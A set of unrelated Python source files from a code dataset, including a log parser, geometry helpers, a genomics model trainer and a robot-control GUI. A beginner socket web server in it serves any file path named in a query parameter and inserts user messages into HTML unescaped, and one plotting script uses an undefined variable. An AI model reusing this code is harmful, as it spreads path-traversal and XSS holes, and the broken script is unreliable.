+{"seq_id":"567105008","text":"#!/usr/bin/python3\n\"\"\"this script parses log files\"\"\"\nfrom signal import signal, SIGINT\nimport sys\nimport re\nimport select\n\n\ni = 0\nsize = 0\nstatCode = {\n 200: 0, 301: 0,\n 400: 0, 401: 0,\n 403: 0, 404: 0,\n 405: 0, 500: 0\n }\n\n\ndef signol(sig, frame):\n \"\"\"signol: handler\"\"\"\n output(size, statCode)\n\n\ndef output(s, sC):\n \"\"\"prints the proper output\"\"\"\n print(\"File size: {}\".format(size))\n for stat, freq in sorted(statCode.items()):\n if freq:\n print(\"{}: {}\".format(stat, freq))\n\n\nsignal(SIGINT, signol)\nif select.select([sys.stdin, ], [], [], 0.0)[0]:\n for data in sys.stdin:\n if i and i % 10 == 0:\n output(size, statCode)\n try:\n code = re.split(' ', data)[-2:-1]\n size += int(re.split(' ', data)[-1])\n if int(code[0]) in statCode:\n statCode[int(code[0])] += 1\n i += 1\n except Exception:\n pass\n\noutput(size, statCode)\n","sub_path":"0x06-log_parsing/0-stats.py","file_name":"0-stats.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"344322505","text":"pi = 3.14\nfull_pi = 3.14285714286\n\n\n\ndef centimeterToMeter(valueOfCmToBeChangedToM):\n print (valueOfCmToBeChangedToM / 100)\n\n\ndef meterToCentimeter(valueOfMeterToBeChangedToCm):\n print (valueOfMeterToBeChangedToCm * 100)\n\n\ndef centimeterToKilometer(valueOfCentimeterToBeChangedToKm):\n print (valueOfCentimeterToBeChangedToKm / 100000)\n\n\ndef kilometerToCentimeter(valueOfKilometerToBeChangedToCm):\n print (valueOfKilometerToBeChangedToCm * 100000)\n\n\ndef meterToKilometer(valueOfMeterToBeChangedToKm):\n print (valueOfMeterToBeChangedToKm / 1000)\n\n\ndef kilometerToMeter(valueOfKilometerToBeChangedToM):\n print (valueOfKilometerToBeChangedToM * 1000)\n\n\ndef millimeterToKilometer(valueOfMillimeterToBeChangedToKm):\n print (valueOfMillimeterToBeChangedToKm / 1000000)\n\n\ndef kilometerToMillimeter(valueOfKilometerToBeChangedToMm):\n print (valueOfKilometerToBeChangedToMm * 1000000)\n\n#Circle\ndef circle(radius, operationToDoInCircle, typeOfCircle):\n if operationToDoInCircle == \"area\":\n #area\n #Type of Circle\n if typeOfCircle == \"Full\":\n return pi * radius * radius\n elif typeOfCircle == \"Semicircle\":\n return pi * 0.5 * radius * radius\n elif typeOfCircle == \"Quarter circle\":\n return pi * 0.25 * radius * radius\n else:\n print (\"Not a supported circle type.\")\n elif operationToDoInCircle == \"perimeter\":\n #perimeter\n if typeOfCircle == \"Full\":\n return pi * radius * 2\n elif typeOfCircle == \"Semicircle\":\n return (0.5 * pi * radius * 2) + radius * 2\n elif typeOfCircle == \"Quarter circle\":\n return (pi * 0.25 * radius * 2) + radius * 2\n else:\n print (\"Not a supported circle type\")\n\n\n else:\n print (\"Not an operation\")\n\n\ndef squareOrRectangle(shape, operationToDo, lengthOfShape, breadthOfShape):\n if shape == \"square\":\n #square\n if lengthOfShape == breadthOfShape:\n\n if operationToDo == \"area\":\n #areaOfSquare\n 
return lengthOfShape ** 2\n elif operationToDo == \"perimeter\":\n #perimeterOfSquare\n return lengthOfShape * 4\n else:\n print (\"Not an operation\")\n else:\n print (\"Not a square\")\n elif shape == \"rectangle\":\n #rectangle\n if operationToDo == \"area\":\n #areaOfRectangle\n return lengthOfShape * breadthOfShape\n elif operationToDo == \"perimeter\":\n #perimeterOfRectangle\n return (lengthOfShape + breadthOfShape) * 2\n else:\n print (\"Not an operation\")\n else:\n print (\"Not a valid shape for function\")\n\n#Triangle\ndef areaOfTriangle(base, height):\n return base * height * 0.5\ndef perimeterOfTriangle(side,nextSide,lastSide,type):\n if type == \"Equilateral\":\n return side * 3\n elif type == \"Isosceles\":\n return side + nextSide * 2\n elif type == \"Scalene\":\n return side + nextSide + lastSide\n else:\n print (\"Error, not a triangle type, the only types are: \\n Equilateral \\n Isosceles \\n and Scalene\")\n\n#Volumes\ndef volumeOfCubeOrCuboid(lengthOfCuboid, breadthOfCuboid, heightOfCuboid, shape):\n if shape == \"Cube\":\n if lengthOfCuboid == breadthOfCuboid and lengthOfCuboid == heightOfCuboid and breadthOfCuboid == heightOfCuboid:\n return lengthOfCuboid ** 3\n else:\n print (\"Not a cube\")\n elif shape == \"Cuboid\":\n return lengthOfCuboid * heightOfCuboid * breadthOfCuboid\n else:\n print (\"Not a cube or cuboid\")\n\ndef findVolumeOfCylinder(base, height):\n print (int(3.14 * base * base * height))\n\n\ndef findVolumeOfPyramid(baseLengthOfPyramid, baseWidthOfPyramid, heightOfPyramid):\n print (int((baseLengthOfPyramid * baseWidthOfPyramid * heightOfPyramid) / 3))\n","sub_path":"cblmath.py","file_name":"cblmath.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"197016995","text":"###############################################################################\n# This file contains the code to train the SpliceAI model.\n###############################################################################\n\nimport numpy as np\nimport sys\nimport time\nimport h5py\nimport keras.backend as kb\nimport tensorflow as tf\nfrom spliceai import *\nfrom utils import *\nfrom constants import *\nfrom custom_utils import Callback, Chromosome\n\n\nassert int(sys.argv[1]) in [80, 400, 2000, 10000]\n###############################################################################\n# Model\n###############################################################################\n\nL = 32\nN_GPUS = 1\n\nif int(sys.argv[1]) == 80:\n W = [11, 11, 11, 11]\n AR = [1, 1, 1, 1]\n BATCH_SIZE = 18*N_GPUS\nelif int(sys.argv[1]) == 400:\n W = [11, 11, 11, 11, 11, 11, 11, 11]\n AR = [1, 1, 1, 1, 4, 4, 4, 4]\n BATCH_SIZE = 18*N_GPUS\nelif int(sys.argv[1]) == 2000:\n W = [11, 11, 11, 11, 11, 11, 11, 11,\n 21, 21, 21, 21]\n AR = [1, 1, 1, 1, 4, 4, 4, 4,\n 10, 10, 10, 10]\n BATCH_SIZE = 12*N_GPUS\nelif int(sys.argv[1]) == 10000:\n W = [11, 11, 11, 11, 11, 11, 11, 11,\n 21, 21, 21, 21, 41, 41, 41, 41]\n AR = [1, 1, 1, 1, 4, 4, 4, 4,\n 10, 10, 10, 10, 25, 25, 25, 25]\n BATCH_SIZE = 6*N_GPUS\n# Hyper-parameters:\n# L: Number of convolution kernels\n# W: Convolution window size in each residual unit\n# AR: Atrous rate in each residual unit\n\nCL = 2 * int(np.sum(np.asarray(AR)*(np.asarray(W)-1)))\nassert CL <= CL_max and CL == int(sys.argv[1])\nprint (\"\\033[1mContext nucleotides: %d\\033[0m\" % (CL))\nprint (\"\\033[1mSequence length (output): %d\\033[0m\" % (SL))\ncallback = 
Callback()\n\n\n###############################################################################\n# Training and validation\n###############################################################################\ntry:\n h5f = h5py.File(data_dir + 'train_all_0.h5', 'r')\nexcept OSError:\n h5f = h5py.File(data_dir + 'train_all_1.h5', 'r')\n\nnum_idx = len(h5f.keys())//2\nh5f.close()\nidx_all = np.random.permutation(num_idx)\nidx_train = idx_all[:int(0.9*num_idx)]\nidx_valid = idx_all[int(0.9*num_idx):]\n\nEPOCH_NUM = 10\n\nstart_time = time.time()\nfid = 0\n\nfor model_idx in range(1, 6):\n model_m = SpliceAI(L, W, AR)\n model_m.compile(loss=categorical_crossentropy_2d, optimizer='adam')\n for epoch_num in range(EPOCH_NUM):\n print(\"model {} epoch {}\".format(model_idx, epoch_num))\n try:\n h5f = h5py.File(data_dir + 'train_all_{}.h5'.format(fid), 'r')\n fid = 1 - fid\n except OSError:\n h5f = h5py.File(data_dir + 'train_all_{}.h5'.format(1-fid), 'r')\n print(\"using {} h5 file for training\".format(1 - fid))\n callback()\n for j in range(len(idx_train)):\n print('epoch progress: {:.2f}'.format(j/len(idx_train)))\n idx = np.random.choice(idx_train)\n X = h5f['X' + str(idx)][:]\n Y = h5f['Y' + str(idx)][:]\n \n Xc, Yc = clip_datapoints(X, Y, CL, N_GPUS) \n model_m.fit(Xc, Yc, batch_size=BATCH_SIZE, verbose=0)\n \n \n \n # Printing metrics (see utils.py for details)\n \n print (\"--------------------------------------------------------------\")\n print (\"\\n\\033[1mValidation set metrics:\\033[0m\")\n \n Y_true_1 = [[] for t in range(1)]\n Y_true_2 = [[] for t in range(1)]\n Y_pred_1 = [[] for t in range(1)]\n Y_pred_2 = [[] for t in range(1)]\n \n for idx in idx_valid:\n \n X = h5f['X' + str(idx)][:]\n Y = h5f['Y' + str(idx)][:]\n \n Xc, Yc = clip_datapoints(X, Y, CL, N_GPUS)\n Yp = model_m.predict(Xc, batch_size=BATCH_SIZE)\n \n if not isinstance(Yp, list):\n Yp = [Yp]\n \n for t in range(1):\n \n is_expr = (Yc[t].sum(axis=(1,2)) >= 1)\n \n Y_true_1[t].extend(Yc[t][is_expr, :, 1].flatten())\n Y_true_2[t].extend(Yc[t][is_expr, :, 2].flatten())\n Y_pred_1[t].extend(Yp[t][is_expr, :, 1].flatten())\n Y_pred_2[t].extend(Yp[t][is_expr, :, 2].flatten())\n \n print (\"\\n\\033[1mAcceptor:\\033[0m\")\n for t in range(1):\n print_topl_statistics(np.asarray(Y_true_1[t]),\n np.asarray(Y_pred_1[t]))\n \n print (\"\\n\\033[1mDonor:\\033[0m\")\n for t in range(1):\n print_topl_statistics(np.asarray(Y_true_2[t]),\n np.asarray(Y_pred_2[t]))\n \n print (\"\\n\\033[1mTraining set metrics:\\033[0m\")\n \n Y_true_1 = [[] for t in range(1)]\n Y_true_2 = [[] for t in range(1)]\n Y_pred_1 = [[] for t in range(1)]\n Y_pred_2 = [[] for t in range(1)]\n \n for idx in idx_train[:len(idx_valid)]:\n \n X = h5f['X' + str(idx)][:]\n Y = h5f['Y' + str(idx)][:]\n \n Xc, Yc = clip_datapoints(X, Y, CL, N_GPUS)\n Yp = model_m.predict(Xc, batch_size=BATCH_SIZE)\n \n if not isinstance(Yp, list):\n Yp = [Yp]\n \n for t in range(1):\n \n is_expr = (Yc[t].sum(axis=(1,2)) >= 1)\n \n Y_true_1[t].extend(Yc[t][is_expr, :, 1].flatten())\n Y_true_2[t].extend(Yc[t][is_expr, :, 2].flatten())\n Y_pred_1[t].extend(Yp[t][is_expr, :, 1].flatten())\n Y_pred_2[t].extend(Yp[t][is_expr, :, 2].flatten())\n \n print (\"\\n\\033[1mAcceptor:\\033[0m\")\n for t in range(1):\n print_topl_statistics(np.asarray(Y_true_1[t]),\n np.asarray(Y_pred_1[t]))\n \n print (\"\\n\\033[1mDonor:\\033[0m\")\n for t in range(1):\n print_topl_statistics(np.asarray(Y_true_2[t]),\n np.asarray(Y_pred_2[t]))\n \n print (\"Learning rate: %.5f\" % 
(kb.get_value(model_m.optimizer.lr)))\n print (\"--- %s seconds ---\" % (time.time() - start_time))\n start_time = time.time()\n \n print (\"--------------------------------------------------------------\")\n \n model_m.save('./Models/SpliceAI' + sys.argv[1]\n + '_c{}'.format(model_idx) + '.h5')\n \n if epoch_num > 4:\n kb.set_value(model_m.optimizer.lr,\n 0.5*kb.get_value(model_m.optimizer.lr))\n # Learning rate decay\n h5f.close()\n \n###############################################################################\n\n","sub_path":"Canonical/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":6571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"521315497","text":"import socket\nimport urllib.parse\n\n\nclass Request(object):\n def __init__(self):\n self.method = 'GET'\n self.path = ''\n self.query = {}\n self.body = ''\n\n def form(self):\n body = urllib.parse.unquote(self.body)\n args = body.split('&')\n f = {}\n for arg in args:\n k, v = arg.split('=')\n f[k] = v\n return f\n\n\nclass Message(object):\n def __init__(self, form):\n self.author = form.get('author', '')\n self.message = form.get('message', '')\n\n def __repr__(self):\n return '{}:{}'.format(self.author, self.message)\n\n\nmessage_list = []\nrequest = Request()\n\n\ndef template(name):\n with open(name, 'r', encoding='utf-8') as f:\n return f.read()\n\n\ndef route_index():\n header = 'HTTP/1.1 210 VERY OK\\r\\nContent-Type: text/html\\r\\n'\n\n body = template('index.html')\n r = header + '\\r\\n' + body\n return r.encode(encoding='utf-8')\n\n\ndef route_message():\n if request.method == 'POST':\n form = request.form()\n msg = Message(form)\n print('message', form, msg)\n message_list.append(msg)\n\n header = 'HTTP/1.1 200 OK\\r\\nContent-Type: text/html\\r\\n'\n body = template('index.html')\n msgs = '
<br>'.join([str(m) for m in message_list])\n body = body.replace('{{messages}}', msgs)\n r = header + '\r\n' + body\n return r.encode(encoding='utf-8')\n\n\ndef route_image():\n filename = request.query.get('file')\n with open(filename, 'rb') as f:\n header = b'HTTP/1.1 200 OK\r\nContent-Type: image/gif\r\n\r\n'\n img = header + f.read()\n return img\n\n\ndef error(code=404):\n e = {\n 404: b'HTTP/1.1 404 NOT FOUND\r\n\r\n<h1>NOT FOUND</h1>',\n }\n return e.get(code, b'')\n\n\ndef parsed_path(path):\n# /msg/add?message=hello&author=gua\n index = path.find('?')\n if index == -1:\n return path,{}\n else:\n path, query_string = path.split('?', 1)\n args = query_string.split('&')\n query = {}\n for arg in args:\n k, v = arg.split('=')\n query[k] = v\n return path, query\n\n\ndef response_for_path(path):\n path, query = parsed_path(path)\n request.path = path\n request.query = query\n r = {\n '/': route_index,\n '/static/image': route_image,\n '/messages': route_message\n }\n response = r.get(path, error)\n return response()\n\n\ndef run(host='', port=3000):\n with socket.socket() as s:\n s.bind((host, port))\n while True:\n s.listen(3)\n connection, address = s.accept()\n r = connection.recv(1000)\n r = r.decode('utf-8')\n try:\n path = r.split()[1]\n request.method = r.split()[0]\n\n request.body = r.split('\r\n\r\n', 1)[1]\n response = response_for_path(path)\n connection.sendall(response)\n except Exception as e:\n print('error', e)\n\n connection.close()\n\n\nif __name__ == '__main__':\n config = dict(\n host='',\n port=3000,\n )\n run(**config)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"229666446","text":"#!/bin/python3\n\nimport random\n\n# sprawdzamy czy podany numer jest liczba calkowita\ndef CzyInt(numer):\n if type(numer) == type(int()): return True\n else: return False\n\n# sprawdzamy czy podany numer jest w dziedzinie funkcji\ndef CzyDziedzina(numer):\n if numer in range(0,36+1): return True\n else: return False\n\ndef CzyParzyste(numer):\n if numer % 2 == 0: return True\n else: return False\n\ndef RuletkaIfy(numer):\n if not CzyInt(numer): return\n if not CzyDziedzina(numer): return\n\n kolor = None\n parzystosc = numer % 2\n\n if numer == 0:\n kolor = 'zielony'\n elif numer in range(1,10+1):\n if CzyParzyste(numer):\n kolor = 'czarny'\n else: \n kolor = 'czerwony'\n elif numer in range(11,18+1):\n if CzyParzyste(numer):\n kolor = 'czerwony'\n else:\n kolor = 'czarny'\n elif numer in range(19,28+1):\n if CzyParzyste(numer):\n kolor = 'czarny'\n else:\n kolor = 'czerwony'\n elif numer in range(29,36+1):\n if CzyParzyste(numer):\n kolor = 'czerwony'\n else:\n kolor = 'czarny'\n\n\n print(\"Numer:\",numer)\n print(\"Kolor:\",kolor)\n\n# ruletka na słownikach\ndef Ruletka(numer):\n if not CzyInt(numer): return\n if not CzyDziedzina(numer): return\n\n przedzialy = {\\\n 'A' : range(0,0+1),\\\n 'B' : range(1,10+1),\\\n 'C' : range(11,18+1),\\\n 'D' : range(19,28+1),\\\n 'E' : range(29,36+1)}\n\n kolory = {\\\n 'A' : ['zielony'],\\\n 'B' : ['czarny','czerwony'],\\\n 'C' : ['czerwony','czarny'],\\\n 'D' : ['czarny','czerwony'],\\\n 'E' : ['czerwony','czarny']}\n\n wylosowanyPrzedzial = None\n\n for przedzial in przedzialy:\n zakres = przedzialy[przedzial]\n if numer in zakres:\n wylosowanyPrzedzial = przedzial\n break\n \n parzystosc = numer % 2\n kolor = kolory[wylosowanyPrzedzial][parzystosc]\n\n print(\"Numer:\",numer)\n print(\"Kolor:\",kolor)\n\n\n\ndef main():\n # pseudo-losowa liczba całkowita z zakresu [0,36]\n numer = random.randint(0,36)\n RuletkaIfy(numer)\n Ruletka(numer)\n\nif __name__==\"__main__\":\n main()\n","sub_path":"grupa-wt-1315-1500/Lekcja09/prog2.py","file_name":"prog2.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"281865687","text":"#!/usr/bin/env python\n# *-# -*- coding: utf-8 -*-\n\n'''\n第4章: 形態素解析\n夏目漱石の小説『吾輩は猫である』の文章(neko.txt)をMeCabを使って形態素解析し,\nその結果をneko.txt.mecabというファイルに保存せよ.このファイルを用いて,\n以下の問に対応するプログラムを実装せよ.\nなお,問題37, 38, 39はmatplotlibもしくはGnuplotを用いるとよい.\n30. 形態素解析結果の読み込み\n形態素解析結果(neko.txt.mecab)を読み込むプログラムを実装せよ.\nただし,各形態素は表層形(surface),基本形(base),品詞(pos),品詞細分類1(pos1)を\nキーとするマッピング型に格納し,1文を形態素(マッピング型)のリストとして表現せよ.\n第4章の残りの問題では,ここで作ったプログラムを活用せよ.\n\n37. 頻度上位10語\n出現頻度が高い10語とその出現頻度をグラフ(例えば棒グラフなど)で表示せよ.\n\n'''\n\n#とりあえず文を読み込むのを使う\nimport module30y_k as myk\nprint(\"----------\")\n\n#単語に修正 変数はmeisiのままだけど・・・\n\nmeisi = []\nfor item in myk.listx:\n meisi.append(item[\"surface\"])\n\n#エクセルのcountifみたいな感じにする\n\n#重複を削除したリストを作成\nsmeisi = list(set(meisi))\n\n#重複を削除したリスト一つ一つでカウントする\nclist = []\nfor item2 in smeisi:\n clist.append([item2, meisi.count(item2)])\n\n#ならべかえ 2個目の「数字」で、逆順に並べ替え\nclist.sort(key=lambda x:(x[1]), reverse=True)\n\nfor ten in clist[:10]: #clist[0:10]の省略\n print(ten)\n\n#さて、グラフを描きます\n# http://yubais.net/doc/matplotlib/bar.html\n#棒グラフの描写は plt.bar() で行います。 引数には2つのリストが必要です。\nimport matplotlib.pyplot as plt\nfrom matplotlib.font_manager import FontProperties\n\n#フォントを設定。Windowsようなので、あしからず\nfp = FontProperties(fname='C:\\Windows\\Fonts\\meiryo.ttc')\n\n'''\nzipを使って書き換え\nX = list(range(1, 11)) #1から10まで\nXlab = []\nY = []\n\nfor item3 in clist[0:10]:\n Xlab.append(item3[0])\n Y.append(item3[1])\n'''\nXlab, Y = zip(*clist[0:10])\n\nplt.bar(X,Y, align=\"center\") # 中央寄せ\nplt.xticks(X, Xlab, fontproperties=fp)\nplt.show()\n\n","sub_path":"30_39/ans37k.py","file_name":"ans37k.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"11851426","text":"from PyQt5.QtGui import QPixmap, QImage\nimport json\nimport cv2\nimport numpy\nimport os\nimport subprocess\nimport signal\nimport robot_api\nimport requests\n\nfrom thread_class import message_display_Thread\nclass Callback(object):\n#返回调用函数\n#{ 响应的统一格式,successed表示请求接口是否成功,失败msg会有错误信息,如果有返回数据,统一在data里获取\n# \"data\":\"\",\n# \"errorCode\":\"\",\n# \"msg\":\"successed\",\n# \"successed\":\"true\"\n# }\n def callback(self,response):\n try:\n if response.content != b\"\":\n response_message = json.loads(response.content) #从json里恢复字典\n if response_message[\"successed\"] != True:\n self.error_view_thread = message_display_Thread(\"error\",response_message[\"msg\"]) # 实例化自己建立的任务线程类\n self.error_view_thread.start()\n else:\n if response_message[\"data\"] != \"\":\n print(response_message[\"data\"])\n except Exception as e:\n print(e)\n\n \n def map_png_callback(self,response):\n image_num = numpy.fromstring(response.content, numpy.uint8) #将字符串转为numpy矩阵\n #opencv可以直接解码png二进制流\n decimg = cv2.imdecode(image_num, cv2.IMREAD_COLOR) #将矩阵解码成图像\n \n shrink = cv2.cvtColor(decimg, cv2.COLOR_BGR2RGB) #将bgr(opencv)转为rgb(pyqt5)\n QtImg = QImage(shrink.data,\n shrink.shape[1],\n shrink.shape[0],\n shrink.shape[1] * 3,\n QImage.Format_RGB888)\n \n self.map_label.setPixmap(QPixmap.fromImage(QtImg))\n self.map_label.setScaledContents(True) # 图片自适应LABEL大小\n self.map_label.show()\n\n def map_png_callback_location(self):\n try:\n decimg = cv2.imread('/home/huziwei/CruiseRobot/ui_background/factoryall.png',cv2.IMREAD_COLOR)\n \n shrink = cv2.cvtColor(decimg, cv2.COLOR_BGR2RGB) #将bgr(opencv)转为rgb(pyqt5)\n QtImg = QImage(shrink.data,\n shrink.shape[1],\n shrink.shape[0],\n shrink.shape[1] * 3,\n QImage.Format_RGB888)\n #生成小车在地图上的位置\n self.map_label.setPixmap(QPixmap.fromImage(QtImg))\n 
self.map_label.setScaledContents(True) # 图片自适应LABEL大小\n self.map_label.show()\n except Exception as e:\n print(e)\n return\n\n def video_receive_callback(self, data):\n try:\n image_num = numpy.fromstring(data, numpy.uint8) #将字符串转为numpy矩阵\n decimg = cv2.imdecode(image_num, cv2.IMREAD_COLOR) #将矩阵解码成图像\n shrink = cv2.cvtColor(decimg, cv2.COLOR_BGR2RGB) #将bgr(opencv)转为rgb(pyqt5)\n QtImg = QImage(shrink.data,\n shrink.shape[1],\n shrink.shape[0],\n shrink.shape[1] * 3,\n QImage.Format_RGB888)\n\n self.video_label.setPixmap(QPixmap.fromImage(QtImg))\n self.video_label.setScaledContents(True) # 图片自适应LABEL大小\n self.video_label.show()\n except Exception:\n return\n\n def red_video_receive_callback(self, data):\n try:\n image_num = numpy.fromstring(data, numpy.uint8) #将字符串转为numpy矩阵\n decimg = cv2.imdecode(image_num, cv2.IMREAD_COLOR) #将矩阵解码成图像\n shrink = cv2.cvtColor(decimg, cv2.COLOR_BGR2RGB) #将bgr(opencv)转为rgb(pyqt5)\n QtImg = QImage(shrink.data,\n shrink.shape[1],\n shrink.shape[0],\n shrink.shape[1] * 3,\n QImage.Format_RGB888)\n\n self.red_video_label.setPixmap(QPixmap.fromImage(QtImg))\n self.red_video_label.setScaledContents(True) # 图片自适应LABEL大小\n self.red_video_label.show()\n except Exception:\n return\n\n def voice_receive_callback(self, data):\n try:\n self.voice_stream.write(data)\n except Exception:\n return\n\n def robot_data_receive_thread_callback(self, respond):\n try:\n data = json.loads(respond.content)\n if data['successed'] != True:\n if data['errorCode'] != 'link_error':\n self.link_status_text_label.setText(\"未初始化\")\n else:\n self.link_status_text_label.setText(\"服务器断开\")\n return\n self.battery_text_label.setText(\"null\")\n self.robot_speed_text_label.setText(\"null\")\n self.charger_status_text_label.setText(\"null\")\n self.charger_status_text_label.setText(\"null\")\n self.navigate_speed_text_label.setText(\"null\")\n else:\n self.link_status_text_label.setText(\"正在运行\")\n self.battery_text_label.setText(f\"{data['data']['battery']}\")\n self.robot_speed_text_label.setText(f\"{data['data']['speed']}\")\n self.navigate_speed_text_label.setText(f\"{data['data']['navigationSpeedLevel']}\")\n self.charger_status_text_label.setText(f\"{data['data']['noticeType']}\")\n\n self.robot_map_datas[\"robot_position\"][\"x\"] = data['data'][\"robot_position\"][\"x\"]\n self.robot_map_datas[\"robot_position\"][\"y\"] = data['data'][\"robot_position\"][\"y\"]\n self.robot_map_datas[\"robot_position\"][\"angle\"] = data['data'][\"robot_position\"][\"angle\"]\n self.robot_map_datas[\"map_width\"] = data['data'][\"map_width\"]\n self.robot_map_datas[\"map_height\"] = data['data'][\"map_height\"]\n x = data['data'][\"robot_position\"][\"x\"]*self.map_widget.width()//self.robot_map_datas[\"map_width\"]\n y = self.map_widget.height() - data['data'][\"robot_position\"][\"y\"]*self.map_widget.height()//self.robot_map_datas[\"map_height\"]\n self.map_label.receive_param(x,y)\n\n self.gas_one_text_label.setText(f\"{data['data']['sensor1']}%\")\n self.gas_two_text_label.setText(f\"{data['data']['sensor2']}%\")\n if data['data']['sensor1'] >50 or data['data']['sensor2'] >50:\n self.security_status_text_label.setText(\"高度风险\")\n self.security_status_text_label.setStyleSheet(\"background-color:red;\")\n elif data['data']['sensor1'] >25 or data['data']['sensor2'] >25:\n self.security_status_text_label.setText(\"中度风险\")\n self.security_status_text_label.setStyleSheet(\"background-color:yellow;\")\n if not self.light_is_open:\n respond = 
requests.get(f\"http://{robot_api.robot_ip}:{robot_api.robot_port}{robot_api.API['open_light']}\", timeout=3)\n self.light_is_open = True\n else:\n self.security_status_text_label.setText(\"安全\")\n self.security_status_text_label.setStyleSheet(\"background-color:rgb(78, 154, 6);\")\n if self.light_is_open:\n respond = requests.get(f\"http://{robot_api.robot_ip}:{robot_api.robot_port}{robot_api.API['close_light']}\", timeout=3)\n self.light_is_open = False\n except Exception as e:\n print(e)\n return\n\n def robot_position_callback(self,data): #实时显示机器人位置\n try:\n self.robot_map_datas[\"robot_position\"][\"x\"] = data[\"gridPosition\"][\"x\"]\n self.robot_map_datas[\"robot_position\"][\"y\"] = data[\"gridPosition\"][\"y\"]\n self.robot_map_datas[\"robot_position\"][\"angle\"] = data[\"angle\"]\n self.robot_map_datas[\"map_width\"] = data[\"mapInfo\"][\"gridWidth\"]\n self.robot_map_datas[\"map_height\"] = data[\"mapInfo\"][\"gridHeight\"]\n x = data[\"gridPosition\"][\"x\"]*self.map_widget.width()//self.robot_map_datas[\"map_width\"]\n y = self.map_widget.height() - data[\"gridPosition\"][\"y\"]*self.map_widget.height()//self.robot_map_datas[\"map_height\"]\n self.map_label.receive_param(x,y)\n except Exception:\n return\n\n def video_open_callback(self,data = ''): #启动视频解码\n try:\n if self.video_process == None:\n self.video_process = subprocess.Popen(\"./src/video_decode\")#启动解码程序\n except Exception as e:\n print(e)\n \n def video_close_callback(self,data = ''): #关闭视频解码\n try:\n if self.video_process != None:\n self.video_process.send_signal(signal.SIGINT)\n except Exception as e:\n print(e)\n self.video_process = None #解码进程关闭\n self.video_red_process = None #解码进程关闭","sub_path":"ui_background/src/callback.py","file_name":"callback.py","file_ext":"py","file_size_in_byte":9166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"329515956","text":"# -*- coding: utf-8 -*-\nimport requests\nimport logging\n\nclass APICaller():\n url = 'http://10.10.4.66:5000'\n timeout = 120\n \n def __init__(self):\n self.logger = logging.getLogger('APICaller')\n \n def turn_left(self, angle):\n \"\"\"\n Calls robot´s API to turn him left\n param:\n angle: number of degrees whitch robot will be turned to left\n \n returns:\n True after robot ends the operation or False if somethink failed\n raise:\n ValueError if angle is negative\n \"\"\"\n if angle > 0:\n logging.critical('Angle is negative ' + str(angle))\n \n return self.__send_turn_request(angle=angle * (-1))\n \n def turn_right(self, angle):\n logging.debug('Turning right')\n return self.__send_turn_request(angle=angle)\n \n def move_forward(self, cm):\n \n params = {'cm': cm} \n \n try:\n self.logger.debug('Sending move_forward request ({0} cm)'.format(cm))\n requests.get(self.url + '/move/forward', params=params, timeout=self.timeout)\n except requests.exceptions.Timeout:\n self.logger.warn('move_forward timeout exception')\n \n return True\n \n def is_in_range(self):\n \"\"\"\n return: True of False\n raise: TimeoutException\n \"\"\"\n self.logger.debug('Sending is_in_range request')\n response = requests.get(self.url + '/trash/isinrange', timeout=self.timeout)\n self.logger.debug('Response: ' + str(response.json()))\n \n return response.json()\n \n def pick_up(self):\n \"\"\"\n return: True if is everithing OK\n raise: TimeoutException\n \"\"\"\n self.logger.debug('Sending pick_up request')\n response = requests.get(self.url + '/trash/pickup', timeout=self.timeout)\n if not response.ok:\n 
self.logger.error('Response is not OK')\n return False\n \n self.logger.debug('Response: ' + str(response.json()))\n return response.json()\n \n \n def __send_turn_request(self, angle):\n\n params = {'angle': angle}\n try:\n self.logger.debug('Sending turn request ({0} angle)'.format(angle))\n response = requests.get(self.url + '/move/turn', params=params, timeout=self.timeout)\n except requests.exceptions.Timeout:\n self.logger.warn('turn request timeout exception')\n return False\n \n if not response.ok:\n self.logger.error('Response is not OK')\n return False\n \n self.logger.debug('Response: ' + str(response.json()))\n return response.json()\n \n \n \n \n \n \n \n \n ","sub_path":"AI/api_caller.py","file_name":"api_caller.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"99842177","text":"from flask_restplus import Namespace, Resource\nimport threading\n\napi = Namespace(\"status\", description=\"Status of the management server\")\n\n\n@api.route(\"/\", strict_slashes=False)\nclass Code(Resource):\n def get(self):\n \"\"\" Get management server status information \"\"\"\n return {\n \"status\": \"happy\",\n \"num_active_threads\": threading.active_count(),\n \"active_threads\": [f\"{t.name} ({t.ident})\" for t in threading.enumerate()],\n }\n","sub_path":"src/datalaunch_server/api/v0/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
